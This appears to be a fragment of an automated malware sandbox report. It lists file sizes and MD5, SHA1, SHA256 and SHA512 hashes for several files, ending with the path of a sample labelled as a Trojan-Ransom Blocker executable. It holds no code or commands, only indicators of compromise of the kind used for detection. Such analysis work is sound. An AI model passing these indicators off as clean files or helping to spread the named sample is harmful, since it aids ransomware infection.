SHA2563e554d5764acaec3baab31ab7ac0d1ffea39dc105435b81cb784fa0ffd0a203a
SHA5129b41fe9321cd3b287544c1d2de97de6a156cee3ec590fd69c4ce427ae8816eaf718d94f007322c989397b016403786018252f801688148eea861aac3b689f80f
-
Filesize
37KB
MD535c2f97eea8819b1caebd23fee732d8f
SHA1e354d1cc43d6a39d9732adea5d3b0f57284255d2
SHA2561adfee058b98206cb4fbe1a46d3ed62a11e1dee2c7ff521c1eef7c706e6a700e
SHA512908149a6f5238fcccd86f7c374986d486590a0991ef5243f0cd9e63cc8e208158a9a812665233b09c3a478233d30f21e3d355b94f36b83644795556f147345bf
-
Filesize
240KB
MD57bf2b57f2a205768755c07f238fb32cc
SHA145356a9dd616ed7161a3b9192e2f318d0ab5ad10
SHA256b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25
SHA51291a39e919296cb5c6eccba710b780519d90035175aa460ec6dbe631324e5e5753bd8d87f395b5481bcd7e1ad623b31a34382d81faae06bef60ec28b49c3122a9
-
Filesize
1KB
MD565494ea6831e577d82fac2b91b9c3d43
SHA15c23717d22ee9b94306f2d5a2a53c60aca03eb8c
SHA2565e98b41a51606e16dda30ad4a49457227f75d71ad2004e2942c6b8de6202c4f3
SHA51228ba13f7793ac8271af03b26eaeba6cbe707bf1f07fb1792818a6ab270d1c20d0091ef4a10c092f60c373aefe09698d2b470ec6a7f8cfa47103fd8bbb8d7a7bb
-
Filesize
2.1MB
MD5c0725ddc38b60b6da25669a9d70dc218
SHA14be063943d21c550319732915944490ecf4b2122
SHA25606577cb0f9183e32c750733da68408650e1cb1dd1245ad07790cc725f5ae5116
SHA5122bca1d0e1baab5345e4bcdda3ef66130868695996f058db041ef1bc7cfaed56ffb427204251e9234813dcfc640529581a0c5058a40f789b3b63ab00d984c8511
-
Filesize
190KB
MD5536ffbb62c23449ea7e25223d4f0691e
SHA17cff2af57a5034357836fe2230934ee1a5c0fa16
SHA25628facb2ccd60ce53e67bd426f295da6d5aeb8fdd4741c48beb42545d4e3eae3a
SHA5124136e7446b5cc32dd9cf0161c26575159ea184cabf770e066d25d9ee5a920ea6285f976716b17a584a2477ded087a55002d699843a0ce05c2291558b889feef7
-
Filesize
640B
MD55d142e7978321fde49abd9a068b64d97
SHA170020fcf7f3d6dafb6c8cd7a55395196a487bef4
SHA256fe222b08327bbfb35cbd627c0526ba7b5755b02ce0a95823a4c0bf58e601d061
SHA5122351284652a9a1b35006baf4727a85199406e464ac33cb4701a6182e1076aaff022c227dbe4ad6e916eba15ebad08b10719a8e86d5a0f89844a163a7d4a7bbf9
-
Filesize
217B
MD5c00d8433fe598abff197e690231531e0
SHA14f6b87a4327ff5343e9e87275d505b9f145a7e42
SHA25652fb776a91b260bf196016ecb195550cdd9084058fe7b4dd3fe2d4fda1b6470e
SHA512a71523ec2bd711e381a37baabd89517dff6c6530a435f4382b7f4056f98aff5d6014e85ce3b79bd1f02fdd6adc925cd3fc051752c1069e9eb511a465cd9908e1
-
\??\c:\users\admin\desktop\00436\trojan-ransom.win32.blocker.nage-ebe3c86f238c4b3cbe2d52e93471c1ca94cb7c9d449108300294256e837a71a9.exe
Filesize8.2MB
MD58991cb75c6e40e542dc81e56d4057108
SHA1bcd6705479d3415db22728353b89cf1ad8f6a15c
SHA256ebe3c86f238c4b3cbe2d52e93471c1ca94cb7c9d449108300294256e837a71a9
SHA512d0f172bcaeea734ba728c3a500975392b39d68fc2077c3d3cc2de8c70b87ddeff8312d5bf1b775b1bebe31048921d57e3b7eaf156cef0692e60c63cde1d4211c